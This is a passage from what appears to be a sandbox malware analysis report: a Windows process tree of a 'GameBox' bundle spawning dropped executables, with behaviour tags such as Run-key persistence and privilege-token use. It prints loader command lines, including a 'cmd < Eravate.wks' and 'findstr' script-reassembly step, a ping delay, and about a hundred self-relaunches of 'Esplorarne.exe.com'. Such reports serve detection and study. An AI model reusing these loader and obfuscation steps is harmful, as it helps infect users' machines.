        Loads dropped DLL
        Enumerates connected drives
        Suspicious use of FindShellTrayWindow
        
        PID:6212
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d10vjpwq.tna\anyname.exe & exit
        9⤵
        
        PID:3048
        
        C:\Users\Admin\AppData\Local\Temp\d10vjpwq.tna\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\d10vjpwq.tna\anyname.exe
        10⤵
        
        PID:6836
        
        C:\Users\Admin\AppData\Local\Temp\d10vjpwq.tna\anyname.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d10vjpwq.tna\anyname.exe" -q
        11⤵
        
        PID:5320
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 764
        12⤵
        Program crash
        
        PID:6584
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x3lbe2is.yac\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:3784
        
        C:\Users\Admin\AppData\Local\Temp\x3lbe2is.yac\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\x3lbe2is.yac\gcleaner.exe /mixfive
        10⤵
        
        PID:3244
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 292
        11⤵
        Program crash
        
        PID:4004
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d5eae0ue.lgv\autosubplayer.exe /S & exit
        9⤵
        
        PID:7636
    - - C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
        5⤵
        
        PID:4456
      - C:\Users\Admin\AppData\Roaming\6961886.exe
        
        "C:\Users\Admin\AppData\Roaming\6961886.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5584
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5584 -s 2356
        7⤵
        Program crash
        
        PID:6972
      - C:\Users\Admin\AppData\Roaming\7773517.exe
        
        "C:\Users\Admin\AppData\Roaming\7773517.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:5912
      - C:\Users\Admin\AppData\Roaming\1029648.exe
        
        "C:\Users\Admin\AppData\Roaming\1029648.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4040
      - C:\Users\Admin\AppData\Roaming\1309205.exe
        
        "C:\Users\Admin\AppData\Roaming\1309205.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5432
      - C:\Users\Admin\AppData\Roaming\3010462.exe
        
        "C:\Users\Admin\AppData\Roaming\3010462.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5564
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5564 -s 2460
        7⤵
        Program crash
        
        PID:7108
    - - C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4996
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 1672
        6⤵
        Program crash
        
        PID:6936
    - - C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
        5⤵
        Executes dropped EXE
        
        PID:5024
      - C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
        6⤵
        
        PID:5164
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:2584
    - - C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1184
      - C:\Users\Admin\AppData\Local\Temp\tmp5871_tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp5871_tmp.exe"
        6⤵
        Executes dropped EXE
        
        PID:1276
        
        C:\Windows\SysWOW64\dllhost.exe
        
        "C:\Windows\System32\dllhost.exe"
        7⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
        7⤵
        Executes dropped EXE
        
        PID:1296
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        8⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
        9⤵
        
        PID:7480
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping YJTUIPJF -n 30
        9⤵
        Runs ping.exe
        
        PID:6768
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        Esplorarne.exe.com i
        9⤵
        Suspicious use of SetThreadContext
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5348
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        10⤵
        
        PID:6556
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        11⤵
        
        PID:7428
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        12⤵
        
        PID:7836
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        13⤵
        
        PID:7344
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        14⤵
        
        PID:8044
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        15⤵
        
        PID:7960
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        16⤵
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        17⤵
        
        PID:4836
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        18⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        19⤵
        
        PID:6700
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        20⤵
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        21⤵
        
        PID:8120
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        22⤵
        
        PID:4320
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        23⤵
        
        PID:6956
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        24⤵
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        25⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        26⤵
        
        PID:6472
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        27⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        28⤵
        
        PID:6080
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        29⤵
        
        PID:4776
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        30⤵
        
        PID:4528
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        31⤵
        
        PID:3508
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        32⤵
        
        PID:2872
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        33⤵
        
        PID:4580
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        34⤵
        
        PID:4744
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        35⤵
        
        PID:1032
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        36⤵
        
        PID:7260
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        37⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        38⤵
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        39⤵
        
        PID:7124
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        40⤵
        
        PID:6080
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        41⤵
        
        PID:6760
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        42⤵
        
        PID:6508
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        43⤵
        
        PID:7896
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        44⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6936
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        45⤵
        
        PID:6008
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        46⤵
        
        PID:3332
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        47⤵
        
        PID:5988
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        48⤵
        
        PID:6512
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        49⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        50⤵
        
        PID:5908
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        51⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        52⤵
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        53⤵
        
        PID:6508
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        54⤵
        
        PID:6640
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        55⤵
        
        PID:4864
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        56⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        57⤵
        
        PID:4932
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        58⤵
        
        PID:6084
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        59⤵
        
        PID:1712
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        60⤵
        
        PID:6004
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        61⤵
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        62⤵
        
        PID:6180
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        63⤵
        
        PID:5572
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        64⤵
        
        PID:4224
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        65⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        66⤵
        
        PID:7364
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        67⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:5756
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        68⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        69⤵
        
        PID:4188
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        70⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        71⤵
        
        PID:7788
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        72⤵
        
        PID:1200
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        73⤵
        
        PID:7132
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        74⤵
        
        PID:2724
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        75⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        76⤵
        
        PID:5592
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        77⤵
        
        PID:2348
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        78⤵
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        79⤵
        
        PID:1504
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        80⤵
        
        PID:3864
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        81⤵
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        82⤵
        
        PID:7112
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        83⤵
        
        PID:6172
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        84⤵
        Modifies data under HKEY_USERS
        
        PID:1344
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        85⤵
        
        PID:6204
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        86⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        87⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        88⤵
        
        PID:6240
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        89⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        90⤵
        
        PID:1236
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        91⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        92⤵
        
        PID:7020
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        93⤵
        
        PID:8164
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        94⤵
        
        PID:2384
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        95⤵
        
        PID:2240
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        96⤵
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        97⤵
        
        PID:7752
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        98⤵
        
        PID:5868
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        99⤵
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        100⤵
        
        PID:3472
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        101⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        102⤵
        
        PID:2596
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        103⤵
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        104⤵
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        105⤵
        
        PID:6444
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        106⤵
        
        PID:2168
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        107⤵
        
        PID:1560
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        108⤵
        
        PID:7800
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        109⤵
        
        PID:3148
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        110⤵
        
        PID:6240
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        111⤵
        
        PID:708
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        112⤵
        
        PID:7816
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        113⤵
        
        PID:2136
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        114⤵
        
        PID:6264
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        115⤵
        
        PID:7432
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        116⤵
        
        PID:6220
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        117⤵
        
        PID:4956
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        118⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        119⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        
        PID:8152
        
